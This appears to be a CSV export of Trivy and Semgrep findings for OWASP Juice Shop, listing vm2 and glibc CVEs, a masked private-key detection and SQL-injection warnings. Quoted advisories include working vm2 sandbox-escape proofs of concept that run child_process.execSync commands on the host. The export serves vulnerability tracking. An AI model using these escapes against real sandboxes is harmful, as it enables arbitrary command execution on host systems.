`localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functions is `globalPromise` object. Version 3.10.2 fixes the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,4af47120ff5cf901b0c3170ee67cd5b2b1ec9eb55fd303e5d37901aa5d2d0df5,223,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.574165+00:00,,,,,0,[],3.10.2,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.10.2 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-22709,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-22709 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.574092+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-22709,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.610081+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,0,2026-05-12,,,"vm2 has sandbox breakout via `neutralizeArraySpeciesBatch` NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.2 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. NEWLINE NEWLINE ### Details NEWLINE NEWLINE The new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object. 
NEWLINE NEWLINE ### PoC NEWLINE NEWLINE ```js NEWLINE const {VM} = require(""vm2""); NEWLINE const vm = new VM(); NEWLINE console.log(vm.run(` NEWLINE const a = []; NEWLINE Object.defineProperty(Array.prototype, 0, { NEWLINE set(value) { NEWLINE a.f = Buffer.prototype.inspect; NEWLINE value.arr.f.constructor.constructor(""return process"")().mainModule.require('child_process').execSync('touch pwned'); NEWLINE } NEWLINE }); NEWLINE new Buffer(a); NEWLINE `)); NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE NEWLINE Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,87bac3f1404ab55d779ac5bacf9ae58e60c875b164734497e0e68045df04bc57,232,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.610167+00:00,,,,,0,[],3.11.2,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.2 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44008 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.610093+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44008,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.605285+00:00,CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H,9.1,,,0,2026-05-12,,,"vm2 NodeVM `nesting: true` bypasses `require: false` allowing sandbox escape and arbitrary OS command execution NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.11.1 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE When a `NodeVM` is created with `nesting: true`, sandbox code can unconditionally `require('vm2')` regardless of the outer VM's `require` configuration — including `require: false`. 
With access to `vm2`, the sandbox constructs a new inner `NodeVM` with its own unrestricted `require` settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a `NodeVM` with `nesting: true` is fully compromised. NEWLINE NEWLINE ### Details NEWLINE NEWLINE The vulnerability is in how the `nesting: true` option interacts with the legacy module resolver. NEWLINE NEWLINE **`lib/nodevm.js:96-99`** — `NESTING_OVERRIDE` is a special builtin map that injects the `vm2` package into the sandbox: NEWLINE NEWLINE ```js NEWLINE const NESTING_OVERRIDE = Object.freeze({ NEWLINE __proto__: null, NEWLINE vm2: vm2NestingLoader NEWLINE }); NEWLINE ``` NEWLINE NEWLINE **`lib/nodevm.js:268-269`** — When `nesting: true`, this override is passed into the resolver factory alongside the host's `require` options: NEWLINE NEWLINE ```js NEWLINE const customResolver = requireOpts instanceof Resolver; NEWLINE const resolver = customResolver ? requireOpts : makeResolverFromLegacyOptions( NEWLINE requireOpts, NEWLINE nesting && NESTING_OVERRIDE, // ← injected when nesting:true NEWLINE this._compiler NEWLINE ); NEWLINE ``` NEWLINE NEWLINE **`lib/resolver-compat.js:193-197`** — This is the vulnerable branch. When `require: false` is set, `requireOpts` is falsy, so `!options` is true. Without nesting the function returns `DENY_RESOLVER` (block everything). 
With nesting, it instead builds a resolver that includes `vm2` from `NESTING_OVERRIDE`: NEWLINE NEWLINE ```js NEWLINE function makeResolverFromLegacyOptions(options, override, compiler) { NEWLINE if (!options) { NEWLINE if (!override) return DENY_RESOLVER; // require:false, no nesting → deny all NEWLINE // BUG: require:false + nesting:true reaches here NEWLINE // override (NESTING_OVERRIDE) is applied, making vm2 available NEWLINE const builtins = makeBuiltinsFromLegacyOptions(undefined, defaultRequire, undefined, override); NEWLINE return new Resolver(DEFAULT_FS, [], builtins); // vm2 is now requireable NEWLINE } NEWLINE // ... NEWLINE } NEWLINE ``` NEWLINE NEWLINE **`lib/builtin.js:102-106`** — `NESTING_OVERRIDE` is merged unconditionally into builtins, overriding any user-configured allowlist: NEWLINE NEWLINE ```js NEWLINE if (overrides) { NEWLINE const keys = Object.getOwnPropertyNames(overrides); NEWLINE for (const key of keys) { NEWLINE res.set(key, overrides[key]); // vm2 always injected when nesting:true NEWLINE } NEWLINE } NEWLINE ``` NEWLINE NEWLINE The result: `require('vm2')` always succeeds inside a `NodeVM` with `nesting: true`, regardless of `require: false`, `require: { builtin: [] }`, or any other restriction. Once the sandbox has `vm2`, it creates a new inner `NodeVM` with whatever `require` config it chooses — unconstrained by the outer VM — and reaches `child_process`. NEWLINE NEWLINE This was introduced in commit `2353ce60` (Feb 8, 2022) and survived a major refactor in commit `9e2b6051` (Apr 8, 2023). The JSDoc for `nesting` does warn that ""scripts can create a NodeVM which can require any host module,"" but does not document that `nesting: true` silently defeats `require: false`, which is the non-obvious part of this interaction. NEWLINE NEWLINE ### PoC NEWLINE NEWLINE **Requirements:** vm2 installed, Node.js v22.22.1 (also reproduced on earlier versions). 
NEWLINE NEWLINE ```js NEWLINE const { NodeVM } = require('vm2'); NEWLINE NEWLINE // Host intends: nesting enabled, but require completely disabled NEWLINE const vm = new NodeVM({ nesting: true, require: false }); NEWLINE NEWLINE const result = vm.run(` NEWLINE // Step 1: require('vm2') succeeds despite require:false on the outer VM NEWLINE const { NodeVM: NVM } = require('vm2'); NEWLINE NEWLINE // Step 2: create an inner NodeVM with attacker-chosen require config NEWLINE // This inner VM has no relation to the outer VM's restrictions NEWLINE const inner = new NVM({ require: { builtin: ['child_process'] } }); NEWLINE NEWLINE // Step 3: execute arbitrary OS command in the inner VM NEWLINE module.exports = inner.run( NEWLINE 'module.exports = require(""child_process"").execSync(""id"").toString()' NEWLINE ); NEWLINE `); NEWLINE NEWLINE console.log(result); NEWLINE // uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),... NEWLINE ``` NEWLINE NEWLINE **Observed output (confirmed on Node v22.22.1, vm2 commit `8dd0591`):** NEWLINE ``` NEWLINE uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),104(kvm),118(lpadmin),989(docker),990(ollama),991(nordvpn) NEWLINE ``` NEWLINE NEWLINE The variant with `require: false` also works — the outer VM's require setting has no effect: NEWLINE NEWLINE ```js NEWLINE new NodeVM({ nesting: true, require: false }).run(` NEWLINE const { NodeVM: NVM } = require('vm2'); NEWLINE module.exports = new NVM({ require: { builtin: ['child_process'] } }) NEWLINE .run('module.exports = require(""child_process"").execSync(""id"").toString()'); NEWLINE `); NEWLINE // uid=1000(akshat) ... NEWLINE ``` NEWLINE NEWLINE Narrow builtin allowlists are also bypassed. `require: { builtin: ['path'] }` still allows `require('vm2')` when nesting is enabled. 
NEWLINE NEWLINE ### Impact NEWLINE NEWLINE **Who is affected:** Any application that runs untrusted or user-supplied code inside a `NodeVM` with `nesting: true`. This includes multi-tenant code execution platforms, notebook/REPL services, plugin systems, and CI sandboxing tools that use vm2. NEWLINE NEWLINE **What an attacker can do:** Execute arbitrary OS commands as the host process user. From there: read/write files, exfiltrate secrets from the environment, move laterally on the host network, or establish persistence. NEWLINE NEWLINE **Severity:** The mental model mismatch is the core danger. A developer who sets `require: false` to lock down modules, then adds `nesting: true` to allow child VM creation, will believe the sandbox is restricted. It is not — `require: false` is silently overridden and the sandbox has unrestricted OS access. NEWLINE NEWLINE **Note:** `nesting: true` must be set by the host. This is not a zero-cooperation escape from a default `NodeVM`. However, it is not pure misconfiguration either: the implementation defeats a strong and reasonable expectation (`require: false` should mean deny all), and the existing warning in the docs does not surface the `require: false` bypass specifically. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,739af6f91ddb58727b24501d4cfb47a3b64ae31e15b0c93b53e6925db27471e6,231,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.605340+00:00,,,,,0,[],3.11.1,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.11.1 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-44007 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.605293+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-44007,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.570102+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,78,2026-05-12,,,"vm2: custom inspect function allows attackers to escape the sandbox and run arbitrary code NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up to and including 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. This may result in Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. There are no patches and no known workarounds. Users are advised to find an alternative software. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,False,,False,False,,False,,9da8ce361021854d554478d9add301e8864240f61d066ef423174229023e6039,222,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.570157+00:00,,,,,0,[],,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-37903 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-37903 NEWLINE https://security.netapp.com/advisory/ntap-20230831-0007 NEWLINE https://security.netapp.com/advisory/ntap-20230831-0007/ NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002 NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-37903,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2023-37903 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.570110+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-37903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.566676+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"vm2: Promise handler sanitization can be bypassed allowing attackers to escape the sandbox and run arbitrary code NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.10.0 NEWLINE NEWLINE vm2 is an advanced vm/sandbox for Node.js. The library contains critical security issues and should not be used for production. The maintenance of the project has been discontinued. In vm2 for versions up to 3.9.19, `Promise` handler sanitization can be bypassed with the `@@species` accessor property allowing attackers to escape the sandbox and run arbitrary code, potentially allowing remote code execution inside the context of vm2 sandbox. Version 3.10.0 contains a patch for the issue. 
NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,770b98428899ad7b461c0611a7805fad579e6abcea4e41b730e46c05c4597c3f,221,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.566728+00:00,,,,,0,[],3.10.0,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-37466 NEWLINE https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9 NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/d9a1fde8ec5a5a9c9e5a69bf91d703950859d744 NEWLINE https://github.com/patriksimek/vm2/releases/tag/v3.10.0 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-37466 NEWLINE https://security.netapp.com/advisory/ntap-20230831-0007 NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002 NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002/ NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-37466,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2023-37466 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.566683+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-37466,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.563199+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,74,2026-05-12,,,vm2: Sandbox Escape NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 3.9.18 NEWLINE NEWLINE vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. 
This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability. NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,5de45cc1a7c6c380875f2116cfa9b46556d7b1a4d8470d5dc6d7ad043e24a648,220,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.563254+00:00,,,,,0,[],3.9.18,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2023-32314 NEWLINE https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac NEWLINE https://github.com/patriksimek/vm2 NEWLINE https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf NEWLINE https://github.com/patriksimek/vm2/releases/tag/3.9.18 NEWLINE https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2023-32314 NEWLINE https://www.cve.org/CVERecord?id=CVE-2023-32314,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2023-32314 Vm2 3.9.17,False,False,,2026-05-12 17:37:05.563207+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2023-32314,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],,,2026-05-12 17:37:05.660090+00:00,,,,,0,2026-05-12,,,Asymmetric Private Key NEWLINE **Category:** AsymmetricPrivateKey NEWLINE **Match:** ----BEGIN RSA PRIVATE 
KEY-----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************-----END RSA PRIVATE NEWLINE ,False,,,False,,,,False,/juice-shop/lib/insecurity.ts,,True,,False,False,,False,,6cb69ea20f84ada1d56684358f2099360cdfd4aafd49206b774d90ffabbfa021,245,,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.660146+00:00,23,,,,0,[],,,S1,False,,,,,,,,False,,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,Secret Detected in /juice-shop/lib/insecurity.ts - Asymmetric Private Key,False,False,,2026-05-12 17:37:05.660097+00:00,,False,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,,secret,Active, +,,True,0,[],,,2026-05-12 17:37:04.518525+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. 
NEWLINE ",False,,,False,,,,False,/src/data/static/codefixes/dbSchemaChallenge_1.ts,,,,False,False,,False,,96a782d96c35b919a694819c27defa3d6eb3fc5847c30a720c626174c484f036,2,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.518582+00:00,5,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.518534+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.522346+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. 
NEWLINE ",False,,,False,,,,False,/src/data/static/codefixes/dbSchemaChallenge_3.ts,,,,False,False,,False,,01082c2e3b0d087751b2b5a5de33426a8c955da41140cd6cc549631147555033,3,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.522416+00:00,11,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.522358+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.525786+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. 
NEWLINE ",False,,,False,,,,False,/src/data/static/codefixes/unionSqlInjectionChallenge_1.ts,,,,False,False,,False,,ff96577206ffc5ef88468f2a16d9dec6744398620a4a59c51ecfb7d5e984a12e,4,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.525842+00:00,6,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.525795+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.529077+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. 
NEWLINE ",False,,,False,,,,False,/src/data/static/codefixes/unionSqlInjectionChallenge_3.ts,,,,False,False,,False,,e4cf67f59b27847f530768137bbd364d0adffc5f43d4e2faeb22d829b39d7ab7,5,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.529136+00:00,10,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.529086+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.559694+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. 
NEWLINE ",False,,,False,,,,False,/src/routes/login.ts,,,,False,False,,False,,18cf39067c5c99611bd071fc090cc6ab2730c0b342ddb473583abbf12fa8d8d0,14,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.559756+00:00,34,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.559703+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.573198+00:00,,,,,89,2026-05-12,,,"**Result message:** Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. 
NEWLINE ",False,,,False,,,,False,/src/routes/search.ts,,,,False,False,,False,,1bf0b263903752029aa809a978cd26d8d2a2bf32c9585422c88e70e7a3a6947a,18,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.573255+00:00,23,,,,0,[],,1,S1,False,,,,,,,,False,https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,False,False,,2026-05-12 17:37:04.573206+00:00,,False,,javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],,,2026-05-12 17:37:04.576533+00:00,,,,,95,2026-05-12,,,**Result message:** Found data from an Express or Next web request flowing to `eval`. If this data is user-controllable this can lead to execution of arbitrary system commands in the context of your application process. Avoid `eval` whenever possible. 
NEWLINE ,False,,,False,,,,False,/src/routes/userProfile.ts,,,,False,False,,False,,eb9f5c7fbc7059d112c8d40c166d5378cfdea907628e793c1172ee4e7828fb4e,19,,False,,False,2026-05-12 17:37:04.489502+00:00,Admin User (admin),1,2026-05-12 17:37:04.576587+00:00,62,,,,0,[],,1,S1,False,,,,,,,,False,https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval NEWLINE https://nodejs.org/api/child_process.html#child_processexeccommand-options-callback NEWLINE https://www.stackhawk.com/blog/nodejs-command-injection-examples-and-prevention/ NEWLINE https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Semgrep JSON Report,2,0,javascript.lang.security.audit.code-string-concat.code-string-concat,False,False,,2026-05-12 17:37:04.576541+00:00,,False,,javascript.lang.security.audit.code-string-concat.code-string-concat,,Semgrep JSON Report,1,Labs Security Testing,1,Juice Shop,,,,Active, +,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.786432+00:00,CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H,7.0,,,426,2026-05-12,,,glibc: static setuid binary dlopen may incorrectly search LD_LIBRARY_PATH NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** 2.36-9+deb12u11 NEWLINE NEWLINE Untrusted LD_LIBRARY_PATH environment variable vulnerability in the GNU C Library version 2.27 to 2.38 allows attacker controlled loading of dynamically shared library in statically compiled setuid binaries that call dlopen (including internal dlopen calls after setlocale or calls to NSS functions such as getaddrinfo). 
NEWLINE ,False,,,False,,,,False,bkimminich/juice-shop:v19.0.0 (debian 12.11),,True,,False,False,,False,,88b6933a6ff101c19c561fdefeb2cd852dad759069e45fa003a4f127f7b77945,28,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:04.786539+00:00,,,,,0,[],2.36-9+deb12u11,,S1,False,,,,,,,,False,http://www.openwall.com/lists/oss-security/2025/05/16/7 NEWLINE http://www.openwall.com/lists/oss-security/2025/05/17/2 NEWLINE https://access.redhat.com/errata/RHSA-2025:8655 NEWLINE https://access.redhat.com/security/cve/CVE-2025-4802 NEWLINE https://bugzilla.redhat.com/2367468 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2367468 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4802 NEWLINE https://errata.almalinux.org/9/ALSA-2025-8655.html NEWLINE https://errata.rockylinux.org/RLSA-2025:8655 NEWLINE https://inbox.sourceware.org/libc-announce/3ac997b0-28a5-4129-af53-675efe4c2dec@redhat.com/T/#u NEWLINE https://linux.oracle.com/cve/CVE-2025-4802.html NEWLINE https://linux.oracle.com/errata/ELSA-2025-8686.html NEWLINE https://lists.debian.org/debian-lts-announce/2025/05/msg00033.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-4802 NEWLINE https://sourceware.org/bugzilla/show_bug.cgi?id=32976 NEWLINE https://sourceware.org/cgit/glibc/commit/?id=1e18586c5820e329f741d5c710275e165581380e NEWLINE https://sourceware.org/cgit/glibc/commit/?id=5451fa962cd0a90a0e2ec1d8910a559ace02bba0 NEWLINE https://ubuntu.com/security/notices/USN-7541-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2025-4802 NEWLINE https://www.openwall.com/lists/oss-security/2025/05/16/7 NEWLINE https://www.openwall.com/lists/oss-security/2025/05/17/2,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-4802 Libc6 2.36-9+deb12u10,False,False,,2026-05-12 17:37:04.786449+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-4802,debian; os-pkgs,"Active, Verified", 
+,,True,0,[],libc6,2.36-9+deb12u10,2026-05-12 17:37:04.792366+00:00,CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H,8.1,,,190,2026-05-12,,,"glibc: Integer overflow in memalign leads to heap corruption NEWLINE **Target:** bkimminich/juice-shop:v19.0.0 (debian 12.11) NEWLINE **Type:** debian NEWLINE **Fixed version:** NEWLINE NEWLINE Passing too large an alignment to the memalign suite of functions (memalign, posix_memalign, aligned_alloc) in the GNU C Library version 2.30 to 2.42 may result in an integer overflow, which could consequently result in a heap corruption. NEWLINE NEWLINE Note that the attacker must have control over both, the size as well as the alignment arguments of the memalign function to be able to exploit this. The size parameter must be close enough to PTRDIFF_MAX so as to overflow size_t along with the large alignment argument. This limits the malicious inputs for the alignment for memalign to the range [1<<62+ 1, 1<<63] and exactly 1<<63 for posix_memalign and aligned_alloc. NEWLINE NEWLINE Typically the alignment argument passed to such functions is a known constrained quantity (e.g. page size, block size, struct sizes) and is not attacker controlled, because of which this may not be easily exploitable in practice. An application bug could potentially result in the input alignment being too large, e.g. due to a different buffer overflow or integer overflow in the application or its dependent libraries, but that is again an uncommon usage pattern given typical sources of alignments. 
